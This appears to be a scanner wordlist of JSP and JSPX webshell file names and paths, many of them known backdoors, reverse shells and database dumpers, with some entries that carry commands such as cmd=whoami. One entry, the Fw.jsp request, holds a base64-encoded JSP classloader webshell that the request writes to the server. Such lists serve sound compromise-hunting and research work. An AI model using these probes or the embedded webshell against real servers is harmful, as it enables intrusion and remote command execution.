7eaeda99742d29a52d3578388b5f28d8a712fa73.jsp
7eaf0de0982a9ebc07630aa15e1fc6270b7d73d8.jsp
7eb3278d8a711fbf2058be163ed86fd7d5d4ddea.jsp
7edcf582835ca4bdaff2312f00ef53b65e7a3d9c.jsp
7fe11e5f98e9945d0b0790d511b24e740ce5d596.jsp
807.jsp
8309be5965504adc35f7d29a272494abce47c686.jsp
83a86bcf989dbbd2b9a24e4497bc9d98e212bf73.jsp
8576d13e8cd8a824068ffc151d86d591b87a6637.jsp
85fb895d152dfd909895e08f4250d2c92e607dc7.jsp
87aa569e2debdb5b38f356b539eb397171b83965.jsp
889c4d2a173c673e62ceb3f612494a2e99c56bc7.jsp
890b58037ee26d9139b393293031c7d485d694f6.jsp
8ce89e73d9ef2d3c53a2eb829f790c5878b5e6f5.jsp
8df56930f13d77c5886e34ca6511c12ae6660d9a.jsp
8e67a916b31b0a1c1bfc4e6a7ad0e575f2fa9e52.jsp
8fd343db0442136e693e745d7af1018a99b042af.jsp
9030e20f07484639377143f4b23e2bcb11bbab8d.jsp
906beecbef0928fbe38e1d9d100e9b02ef8e73fe.jsp
90ee7f3c291f78fbab6414fd7e2545f4a5eabf4f.jsp
911244498eb6805634d83261e7a1391cff40fa06.jsp
919b109751aa79f0dd2aecb1d7d23e58d9544543.jsp
91cf96c983ad2efaca225a1050e1607f3e7c5e03.jsp
9230e8c1c6dad3db204afacd3b36176d2da31165.jsp
93e42d381b31fd1d57de2e541cf68b7c75bff94e.jsp
94ab67132ee34b6423c3141938a54fb7ed4a951e.jsp
94d1aaabde8ff9b4b8f394dc68caebf981c86587.jsp
954f2e099e6c7dec5d14957372c2950cc00b3580.jsp
958ffda1155a5fc1b0970faac8f7dde2a6e30e49.jsp
95zzz.jspx
960a8918fd121a3976109f77e3eba4e5b955505f.jsp
9845d43612a8f384ade74af23dcc4e9e94f7de6a.jspx
99c8babf50402275b1e92a29b6c8e83d51fb1456.jsp
9a3b1b82d9d9ce4f25a54794df07ca005bee12bb.jsp
9a7309e40f3173d1c96144fa3ded4b58ebcb0c90.jsp
9c2d0a4f5d47b78e10c8bc246a7a236359bc2952.jsp
9d0e72dbbf8ef296ec5f651cffcfdc78fc0ad100.jsp
9e32b877-e01d-4948-80e9-8e65151ca2b6.jsp
9e39dcf1673ae2b496cad98dc10f64a22cb0a1f9.jsp
9f1df0249a6a491cdd5df598d83307338daa4c43.jsp
AKLvlT.jsp
Ajax.jsp?Ppwd=nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA
Alert.jsp?Hok8gxZFafGORRLCiowY_vpqNappusQV8agmQkI7wKk=1
BackerHack JSP Manage-System 1.0.jsp
BackerHack JSP Manage-System 1.0.jsp~
BmODCKTQ.jsp
Browser.jsp
CaiDao-Webshell-Password-LandGrey.jsp
Command Execution (win32).jsp
Command Execution (win32).jsp~
ConsoleHelp/login.jsp
CryptCore.jsp
Customize.jsp
Debug.jsp
Delete.jsp
Docs.jsp
ExceptionThrown.jsp
Fw.jsp
Fw.jsp?f=x.jsp&t=PCVAcGFnZSBpbXBvcnQ9ImphdmF4LnhtbC5iaW5kLiosamF2YS5sYW5nLioiJT48JSFjbGFzcyBVIGV4dGVuZHMgQ2xhc3NMb2FkZXIge1UoQ2xhc3NMb2FkZXIgYykge3N1cGVyKGMpO31wdWJsaWMgQ2xhc3MgZyhieXRlW10gYikge3JldHVybiBzdXBlci5kZWZpbmVDbGFzcyhiLCAwLCBiLmxlbmd0aCk7fX0lPjwlIFN0cmluZyBjID0gKFN0cmluZykgcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImMiKTtpZiAobnVsbCA9PSBjICYmIG51bGwgIT0gc2Vzc2lvbiljPShTdHJpbmcpc2Vzc2lvbi5nZXRBdHRyaWJ1dGUoImMiKTtpZiAobnVsbCA9PSBjICYmIG51bGwgIT0gYXBwbGljYXRpb24uZ2V0QXR0cmlidXRlKCJfY18iKSljPShTdHJpbmcpYXBwbGljYXRpb24uZ2V0QXR0cmlidXRlKCJfY18iKTtpZiAobnVsbCAhPSBjKXRyeSB7YXBwbGljYXRpb24uc2V0QXR0cmlidXRlKCJfY18iLGMpO25ldyBVKHRoaXMuZ2V0Q2xhc3MoKS5nZXRDbGFzc0xvYWRlcigpKS5nKERhdGF0eXBlQ29udmVydGVyLnBhcnNlQmFzZTY0QmluYXJ5KGMpKS5uZXdJbnN0YW5jZSgpLmVxdWFscyhwYWdlQ29udGV4dCk7fSBjYXRjaCAoRXhjZXB0aW9uIGUpIHt9JT4=
GwmcLov.jsp
Hello.jsp
HelloHTML.jsp
HelloHTMLError.jsp
HelloVXML.jsp
HelloVXMLError.jsp
HelloWML.jsp
HelloWMLError.jsp
HelloWorld.jsp
HitCount.jsp
IXRbE.jsp
IXRbE02.jsp
JFolder.jsp
JFolder.jsp~
JFoler 1.0.jsp
JFoler 1.0.jsp~
JSP Backdoor Reverse Shell.jsp
JSP Shell 岁月联盟专用版本.jsp
JSP Shell 岁月联盟专用版本.jsp~
JSP一句话、已测试.jsp
JSP菜刀一句话木马.jsp
Java Shell.jsp
JspDo Code By Xiao.3.jsp
JspDo Code By Xiao.3.jsp~
JspHelper Codz By - Leo.jsp
JspHelper Codz By - Leo.jsp~
JspSpy Codz By - Ninty.jsp
JspSpy Codz By - Ninty.jsp~
JspSpy Codz By - Ninty_1.jsp
JspSpy Codz By - Ninty_1.jsp~
JspSpy Private Codz By - Ninty.jsp
JspSpy Private Codz By - Ninty.jsp~
JspSpy Private Codz By - Ninty_encode.jsp
JspSpy Private Codz By - Ninty_encode.jsp~
JspSpy.jsp
JspSpy.jsp~
JspSpy.jsp~1
JspSpy.jsp~2
JspSpy1.jsp
JspSpy2009.jsp
JspSpyJDK5.jsp
JspSpyJDK5.jsp~
JspSpyJDK51.jsp
JspTqz.jsp
JspTqz.jsp~
JspWebshell 1.2.jsp
JspWebshell 1.2.jsp.txt
Jspspy web~shell V1.0 ※MADE by 孤水绕城 QQ540410588.jsp
Jspspy web~shell V1.0 ※MADE by 孤水绕城 QQ540410588.jsp~
Jspspyweb.jsp?action=B&command=netstat
K8飞刀一句话密码为lemon.jsp
MP_verify_tPg2TnCah9Al81Ej.txt
ModifyRegistryTp.jsp
Mysql Database.jsp
Mysql Database.jsp~
Oracle Database.jsp
Oracle Database.jsp~
Ping.jsp
ProcessBuilder-cmd.jsp
ProcessBuilder-reflect-cmd.jsp
ROOTtows.jsp
Runtime-reflect-cmd.jsp
SJavaWebManageV1.4.jsp
SJavaWebManageV1.4.jsp~
SJavaWebManageV1.4.jsp~1
Silic Group.jsp
Silic Group.jsp~
Silic.jsp
UknowThis.jsp
UknowThis.jsp?cmd=whoami
ValidationError.jsp
WLUpdate.jsp
WSsamples/index.jsp
Wisdom.jsp
X11.jsp
X3*.jsp
X3_verify*.jsp
X3_verify_mIjyqEnm7D1D_tyJ0FN3rw.jsp
X3_verify_mIjyqEnm7D1D_tyJ0FN3rw.jsp.jsp
X9.jsp
XXOO.jsp
XXOO.jsp~
XZimbra.jsp?f037KfDS-uNcpGsM45mGqbjjKhqUUng7_fY2U9-85Gs=1
Xt01.jsp
Xtunnel.jsp
YeRUWDmE.jsp
ZombieBoy.jsp
_*.jsp
_.jsp
_.t.jsp
_46_sjn4gwl3l191.jsp
__xs1pwn_.jsp
_com.jsp
_goOk.jsp
_sjn4gwl3l191.jsp
a.jsp
a.jspx
a04003c2dfca3bdd0ebf1a641e49cce34b4b1b5d.jsp
a20dcd6bfafb313da2ed9e8bf006b0cf6026084c.jspx
a2951b681435c42a5d89bdc7606042f821b134ef.jsp
a65a0e13d5a1a404366f6bfd92e5dde6e94a6ba6.jsp
aa62348ad603bd54abdda7a419b13eebb8cc2a42.jsp
aaa.jsp?pass=1
aaaaaaaaaa.jsp
aaajsp.jsp
aab2003aabc5893ecb63edef66297089c59d88fc.jsp
aaee794b7c8b091313325da6082cd2d361e400f6.jspx
ab52ce045d029a36b38aac98c497f4cd2371acd1.jspx
abc.jsp
ac91e5b9b9dcd373eaa9360a51aa661481ab9429.jsp
action.jsp
adam.jsp
add_supplier.jsp
admin/logon.jsp
admin/secure/logon.jsp
ae3e4a01510afef2b72758a070230889f2279cb0.jsp
af1bfebf-d12f-47b3-b3ef-37246e667eda.jsp
af5771b6fad74623eb9d85fc8f865c3dd5712330.jsp
agagjk.jsp
appinc.jsp
applyFile.jsp
asd.jsp
astGo000.jsp
att.jsp
b0456b5fb1b3501c2732e3a64157a95109f175dd.jsp
b0baca1d732c0704a7ae1ecd6d7229a4cb63222c.jsp
b0bf32a5535c8815eff7429338d0111f2eef41ae.jsp
b1.jsp
b11440638084ab162d5759d23f881ea0fc13a28b.jsp
b33181d4e25c844360ac8bcb0630c3ccc0819100.jsp
b38f4670886e79bc4d6a4e5a6e0e852d981048d7.jsp
b3907f726d5ce1f20eafb085e8aaf39453e78c17.jsp
b3e5dd93abcc725407c00ad0e68f8e789bffbe4d.jsp
b4365473309f8c3b.jsp
b4365473309f8c3c.jsp
b4544b119f919d8cbf40ca2c4a7ab5c1a4da73a3.jsp
b4cb43723713f738004b79b64b138e3e8507427e.jsp
b5729bda81828db973f74fd1c1448f48f81e4a6b.jsp
b6eaf949b5037ce7ed2b16ed0752bc506b0664a2.jsp
b783b4c5b8e4db4c6a211e6fc06c5aafbdf4e211.jsp
b7e6f10e4ddb0e1b830664a289395c34979f40aa.jsp
b9fab60c8f75ff5b7eb3c18731f8ab2441391549.jsp
ba39f19d1dc058fa4b3e0a500c55e1a2f3e0c706.jsp
backdoor.jsp
backdoor.jsp_
bak.jsp
bak_jspx
base64.jspx
base64.jspx.txt
bb.jsp
bb.txt.jsp
bbff3db22a3ef1a273d02fc0a5031c77d5f6a20e.jsp
bc1e03a04fc41a10945e263d865f30ad91f6736c.jsp
bcb6d19990c7eba27f5667d3d35d3a4e8a563b88.jsp
bcf292f93cd3b73d1bb6d95b2ac6396d2b6e7b67.jsp
bdaeb74a61e4ba6a92593ad8a115b8d055b80f4e.jsp
bdaf9279b3d9e07e955d0ce706d9c42e4bdf9aa1.jsp
bdc6b9a253e6277e9bfbbf21429a9f367dc59885.jsp
bea_wls_internal/a2e2gp2r2/x.jsp
bea_wls_internal/psquare/x.jsp
bee670efc19f12a63d9946c8550526fddcb5b0f6.jsp
bf7d2a8eede3d38f8d3c7491fed173dd746d4b55.jsp
bfdc120b44527820c339fa6325421f3bdb9b903d.jsp
blah-whatever-badfile.jsp
blah-whatever.jsp
browser.jsp
build.jsp
by Bagheera.jsp
by Bagheera.jsp~
c188ac007a3ea8d4f145578598bf6693797b5f76.jsp
c1efcbdb38003f4b4d11b022b69ecdbad90025a6.jsp
c28fd0717d3b18f52f8792d4395d16b2c6255191.jsp
c37d64f4f1b8cbbb0369eb1e192ed5eb437fdba8.jsp
c5.jsp
c59221b4af6a1faeab6deb64fea827acdd9bc91b.jsp
c6350dc4b52b5b88f2197a0ce8e415423383f537.jsp
c6a8ac7f441e8838e113c40041e7ad0808d5fc1d.jsp
c718c885b5d6e29161ee8ea0acadb6e53c556513.jsp
c7303f1a6c0f8dcb2d54086570a862364a68b047.jsp
c7ec7e8f9270324f17c8fecaebaf10087b4a6c2f.jsp
c8678727a4701d07a11cab2ca898e7207b3240a6.jsp
c8e1ddd7c5016d152ce2459980982ed4ebf200a0.jsp
ca471715b0ff91c807c6b3c257931ecbd4b0f74c.jsp
ca666.jsp
caLogonHandle.jsp
cabx.jsp
cachemonitor/statistics.jsp
caidao.jsp
caidao.jsp~
calculateh2.jsp
callbackiframe.jsp
campSmsInfo.jsp
campStepChange.jsp
carddata4.jsp
cat.jsp
cat.jspx
cat.jspx~
catbet1.jsp
catbet2.jsp
cb68d7535631dc7c823afd6ad8e5aa838bccd374.jsp
cc.jsp
cc1bd92ef8a894c89c35da6115c996e98dd29a6b.jsp
cc3205c727a134525f1d5f7f8e9f9dacf16f6419.jsp
cca3ee71414b8c58dc3abd3bd59dbcf44a60d957.jsp
ccb11b02170a505b496d26868fb98a785c3aac51.jsp
ccf6242dcc8dcbfde4fd317aeb99d9a627b972b9.jsp
ce75d5685159bd905c93dd3591215d940899ad06.jsp
cedc20a9fe73d669e5cf2d73f93b8bdbe7acc80f.jsp
ceshi.jsp
check.jsp
ck.jsp
clusterframe.jsp
cmd.jsp
cmd.jspx
cmd1.jsp
cmd2.jsp
cmd_win32.jsp
cmdjsp.jsp
cmdjsp.jsp.txt
cmdjsp.jsp~
cnvd.jsp
code.jsp
cofigrue.jsp
compass/logon.jsp
config.jsp
configer.jsp
conn.jsp
cookiesNotSupported.jsp
css.jsp
css1.jsp
customize.jsp
d15271811cfea64a1c1a76017a3dd668f60f1b98.jsp
d1f82ad79dabb67201101e5eebb4bced8d974493.jsp
d51d367159c1a4f72ea64f0c2d160c8204cdf29e.jsp
d54cc912a2c626c17569b48b10e9f38c0556b7b6.jsp
d68c520c23e129a03bbb1ca3c2a305fc6cad26a3.jsp
d71c095470234ec31a870acd0a4d3c329692fc89.jsp
d81109025958f6b0f0a92f3ce8daa0980b111a9c.jsp
d8240b86440106b5a54200760c0f914bd8117658.jsp
d849bdd27a25abed4c99f23174633f752b42d496.jsp
d897704943e335715e3589551c007622628fc9d1.jsp
d89a1e68f81d5156cd4ec0b6e073def8203bdd56.jsp
d99b32ab6dc6a0b437bbcfb6ff5c25b73e715372.jsp
da2336a99bee703b174c263d5ef2365399f3316e.jsp
data.jsp
data02.jsp
date.jsp.txt
dba.jsp
dbconecting17.jsp
dbconecting1721577942.jsp
dbconecting1739317912.jsp
dbconecting1959592161.jsp
dbconecting411989440.jsp
dbconecting57318228.jsp
dbe.jsp
dbff4ab1cb157db88dc3542a8c96b9ed0cc6ba2b.jsp
dbi.jsp
dbs.jsp
dc2a4efa67ec9670bae07478ca3c0ade3aefb1d3.jsp
dcf3908bc77f30cbd88cec26b0a6719fccc3c7f0.jsp
dd29ce7a3bfa9b892317f4b7ea7cca13c9e9aeed.jsp
dd8294851aee7c3615461c60fdaefc4145140f34.jsp
de31b3222630eb5450177b27005c0e031f667df5.jsp
debug_error.jsp
ded5eb546aa78dec7a51fd4f249c4c1ef5ec91f9.jsp
dem0.jsp
demo.jsp
demo.jsp?pwd=admin&cmd=ipconfig
demo/sql/index.jsp
devilzShell.jsp
devilzShell.jsp~
devshell.jsp
df09b26aae0d3f7d0f5e0df411b688e0dea51488.jsp
dfa8bd63142af1bb691c72e132b0e362b9963c3f.jsp
dirb_random.jsp
dm.jsp
dmx.jsp
down.jsp
down1.jsp
download.jsp
dwnb.txt.bx.jsp
dwnb.txt.xm.jsp
dy.jsp
e278a2011b9ebb9eeaa54d46eb8cb3f8f1f926b1.jsp
e303bc2ccd024c736d894cd088f7edd360578e89.jsp
e322ff335ed9866caf9c0f15e2471873a2b4a7d3.jsp
e45e1180934fae287e6843e9e38666fe29b4ac76.jsp
e4fa5772ddaac60c0a4299ff51dc46f5ef63d859.jsp
e51080732e162b927fca9b2a9e7bcbaf446bb4a3.jsp
e5124513286150f6530d083d6f8d87e978cd7cf1.jsp
e52b7486b64bcc30087858e6ace4041c87dcc7f1.jsp
e564ca392f108addd7728966fdbdad98cfe5660e.jsp
e5c63e8a655f8f03566c39c84c4aa417e194db14.jsp
e6a33e17569749612b06e3001544b2f04345d5ae.jsp
e76e2cc724464a92fa497d74524db6fc9b42c7ec.jsp
e9060aa2caf96be49e3b6f490d08b8a996c4b084.jsp
e98aa4fe2ab52392ae8051897b93566e3ecb9d79.jsp
e9d1a110f494c0aae7ba506f2d5440e50df91f2c.jsp
e9fcd44d77864312ec51f14a203046844e5c32a5.jsp
ec90200f4e2708faa21e371b2fc076c51412515f.jsp
ecc2ea54f0a1554637c75d5173de44c9644d764f.jsp
ed2aa0d6782cc43cbd36dbad1f74ebc6de698f71.jsp
edit_ot.jsp
edit_user_pwd.jsp
ee1d81cba39fb4877c803d32f17348d7cd36348f.jsp
ee9408eb923f2d16f606a5aaac7e16b009797a07.jsp
ef98ca135dfb9dcdd2f730b18e883adf50c4ab82.jsp
emails.jsp
emails2.jsp
error.jsp
ex/jsp/simple.jsp.
f.jsp
f09cc90eb405b506535de9511c54fff8c8543b9c.jsp
f12.jsp
f35597280545d99a482b0f6e577327dfa3cebe43.jsp
f3c627b626dbe602b6a784b83fba1908a5a0f78d.jsp
f4927e1f9af642ef5ad4fb4bcecaad83dcc0de3d.jsp
f86bce63215503313ca121ad2560c0c1e86fff15.jsp
f8b09604ea074d94862d35fcd4e2c6032c66f834.jsp
f8e821109bf34adcb88af9f0fb9a2d5e.jsp
f9b9b3cdb3e9a11e528aed1ef68182a0140a4b8d.jsp
fa9997cb67fe248ef67d8bbcf6ebeecd1707818c.jsp
favicon.ico
favicon.jsp
fb29687c2e81f09596a7d29efdb47dc52d7a43b0.jsp
fc7043aaac0ee2d860d11f18ddfffbede9d07957.jsp
fdsafkkebjhfgbx.jsp
fead711bab09ddcd9d526d05529ef0c314565565.jsp
ff.jsp
ff6e83c72acf21c58d67873de03ec26c31347731.jsp
file/index.jsp
file12.jsp
fuck.jsp
fuckjp.jsp
fun.jsp
getElementById0000.jsp
guest.jsp
guige.jsp
guige02.jsp
ha.jsp
he1p.jsp
hellouser.jsp
help.jsp
hsxa.jsp
hsxa1.jsp
ice.jsp
icesword.jsp
in.jsp
inback3.jsp
ind5k.jsp
index.jspx
index1.jsp
index123.jsp
index7833.jsp
index_360desk.jsp
index_bak.jsp
index_bak1.jsp
index_blue.jsp
index_desktop.jsp
index_sys.jsp
indexop.jsp.上传.jsp
info.jsp
it.jsp
itt.jsp
jdbc.jsp
jdni_weblogic_04e6a960d599.jsp
jdni_weblogic_08613b9f5578.jsp
jdni_weblogic_187fa034580f.jsp
jdni_weblogic_1974ede8c196.jsp
jdni_weblogic_1a7f9ecb1091.jsp
jdni_weblogic_1a82e7231731.jsp
jdni_weblogic_1e960ae24f93.jsp
jdni_weblogic_242177e678a4.jsp
jdni_weblogic_347cc9a822a5.jsp
jdni_weblogic_57bcb660d792.jsp
jdni_weblogic_622ebd74c42b.jsp
jdni_weblogic_660f688e4edb.jsp
jdni_weblogic_78dd417e0a9d.jsp
jdni_weblogic_7f13352eade9.jsp
jdni_weblogic_8371ce2cfafb.jsp
jdni_weblogic_838e01a83bd6.jsp
jdni_weblogic_87207ccbf456.jsp
jdni_weblogic_99c4d25e9587.jsp
jdni_weblogic_aa14369aec11.jsp
jdni_weblogic_aed68c1d303c.jsp
jdni_weblogic_d05b68bf4523.jsp
jdni_weblogic_d8918040e667.jsp
jdni_weblogic_fc8471cbfdc3.jsp
jfolder01.jsp
jjw.jspx
jnfxsVoX.jsp
job.jsp
jshell ver 0.1.jsp
jshell ver 0.1.jsp~
jshell ver 1.0.jsp
jshell.jsp
jsp wget drag database.jsp.txt
jsp-reverse.jsp
jsp-reverse.jsp.txt
jsp.jsp
jsp.jspx
jspShell.jsp
jsp_File_browser.jsp
jsp_custom_spy_for_mysql.jsp
jspbd.jsp
jspshall.jsp
jspshall.jsp.txt
jspspy.jsp
jspspy.jspx
jspspy2012.jsp
jspspy_k8.jsp
jspspy_k8.jsp~
jspspypingmu.jsp
jsptest.jsp+
jspx.jspx
jspx.jspx~
jspy.jsp
jsp木马.jsp
jsp一句话.jsp
jw.jspx
k.jsp
k81.jsp
k8cmd.jsp
kkll.jsp
leo.jsp
lianan.jsp
libes.jsp
list.jsp
list1.jsp
lmYDlNFP.jsp
logger小马.jsp
login.jsp
login1.jspx
login2.jsp
login_2015.jsp
logout.jsp
logs1.jsp
ls.jsp
ls.jspx
luci.jsp.spy2009.jsp
m.jsp
ma (1).jsp
ma.jsp
ma1.jsp
ma2.jsp
ma3.jsp
ma4.jsp
main.jsp
maint.jsp
me5.jsp
me5.jsp?pwd=me5&cmd=whoami
menu.jsp
menuSys.jsp
menuSys.jsp?ls=whoami
mg.jsp
minupload.jsp
mmym520.jsp
modify_supplier.jsp
ms231.jsp
mysql数据库脱单个表.jsp
myxx.jsp
myxx1.jsp
netspy.jsp
ni.jsp
nmapunix.jsp
no.jsp
nogfw.jsp
nullca6.jsp
nullca666.jsp
nullcmd2.jsp
nulllist.jsp
o01561023045980.jsp
ok.jsp
ok3.jsp
one.jsp
one1.jsp
one8.jsp
oo.jspx
oracle.jsp
oracle脱裤脚本.jsp
output.jsp
p1.jsp
page.jsp
paxmac.jspx
paxmac.jspx~
pb.jsp
port.jsp
portalAppAdmin/login.jsp
psquare/x.jsp
pwnshell - an interactive jsp shell.jsp
pwnshell - an interactive jsp shell.jsp~
pwnx3.jsp?51pwn_comw=1
pwnx32020.jsp
pyth.jsp
qq.jsp
queryDong.jsp
re.jsp
reDuh.jsp
rebel.jsp
rebel1.jsp
regApp.jsp
ringzer0.jsp
runtime_messages.jsp
s.jsp
s01.jsp
s02.jsp
s03.jsp
s04.jsp
s08.jsp
s09.jsp
s10.jsp
s11.jsp
s8Jn4gWlqX2c5.jsp
s8Jn4gWlqX2c5.jsp?cmd=whoami
sJn4gWlqX1c592.jsp
satan.jsp
sc.jsp
sca/menu.jsp
sda.jsp
serviceInstitutionConfig_init.jsp
sh.jsp
shaoyu.jsp
shell.jsp
shell.jspx
shell0643.jsp?cmd=whoami
shell1.jsp
shen12.jsp
silic Shell.jsp
silic webshell.jsp
simple-shell.jsp
simple.jsp
simple_shell.jsp
sitemap.jsp
snoop.jsp
soeasy.jsp
spjspshell.jsp
spyjsp2010.jsp
st1.jsp
st3.jsp
st5.jsp
st6.jsp
stager.jsp_
statistics.jsp
stt.jsp
style.jsp
stylesheet.jsp
suiyue.jsp
sys.jsp
sys3.jsp
system.jsp
system1.jsp.上传.jsp
t.jsp
t00ls.jsp
t00ls1.jsp
te123.jsp
te8.jsp
te8.jsp?cmd=whoami
temp.jsp
test.ico
test.jsp
test.jspx
test/bak.jsp
test/index.jsp
test/realPath.jsp
test/zero.jsp
test1.jsp
test111.jsp
test1111.jsp
test1122.jsp
test121.jsp
test12345.jsp
test123jks.jsp
test1j.jsp
test2.jsp
test222.jsp
test2222.jsp
test2j.jsp
test66.jsp
test9527.jsp
testAnt.jsp
test_.jsp
test_.jsp?51pwn_comw=1
test_.jsp?pass=1
testjsp.jsp
testkrm.jsp
thx.jsp
tianzi.jsp
time.jsp
tmpbutian.jsp
tomcatwar.jsp
tree.jsp
tset.jsp
tst.jsp
tunnel.jsp
tunnel.tomcat.5.jsp
tunneltm5.jsp
u.jsp
unsafe.jsp
up.jsp
up1.jsp
up2.jsp
up_win32.jsp
upgrade.jsp
url.jsp
usebean.jsp
utils.jsp
ver007.jsp
ver008.jsp
very_simple.jsp
view_source.jsp
w.jsp
w.jspx
w02.jsp
w03.jsp
w1.jsp
warcd.jsp
warn.jsp
warsyss.jsp
warsyw.jsp
wblgc.jsp
wconfig.jsp
we71ih66.jsp
weaver/bsh.servlet.BshServlet
web.jsp
web02.jsp
web2.jsp
webapp/examples/simple.jsp
weblogic_test1.jsp
weblogic_test2.jsp
webshell-nc.jsp
webshell.jsp
webshell.jspx
webshell1.jsp
webshell2.jsp
webshell3.jsp
webshell4.jsp
welcomeuser.jsp
wgic.jsp
wlscmd.jsp
ws-client/loanCalculation.jsp
ws1.jsp
ws2.jsp
ws3.jsp
ws4.jsp
ws_utc/resources/setting/keystore?timestamp=23424242
ww.jsp
www.jsp
x.jsp
x1.jsp
x10.jsp
x11.jsp
x2.jsp
x3.jsp
x3_upf.jsp
x4.jsp
x5.jsp
x5.jsp?ls=whoami&cmd=whoami
x6.jsp?ls=whoami
x7.jsp
x999999999.jsp
x_final.jsp
x_old.jsp
xia.jsp
xm.jsp
xm11.jsp
xm2019.jsp
xx.jsp
xx2.jsp
xxx.jsp
yaycve.jsp
yayshell.jsp
yijuhua.jsp
youdao.jsp
zend.jsp
zero.jsp
zval.jsp
zx.jsp
zx.jsp000.jsp
老V.jsp
老V.jsp~
脱mysql数据库.jsp
小马.jsp
小马.jsp~
新型JSP小马支持上传任意格式文件.jsp
新型JSP小马支持上传任意格式文件.jsp~
菜刀jsp修改.jsp
菜刀jsp脚本文明版.jsp
菜刀jsp脚本更新版.jsp
菜刀jsp脚本无压缩版.jsp
上传小马.jsp
内网探测.jsp
反弹脚本.jsp
岁月联盟.jsp
上传小马.jsp~
内网扫描header.jsp
无密码的jsp大马.jsp
苦咖啡专用.jsp
菊花聊天室.jsp
苦咖啡专用.jsp~
非常牛逼的Jsp大马.jsp
带回显执行cmd.jsp
灭天远程管理.jsp
灭天远程管理.jsp~
内网渗透探测out.jsp".t.jsp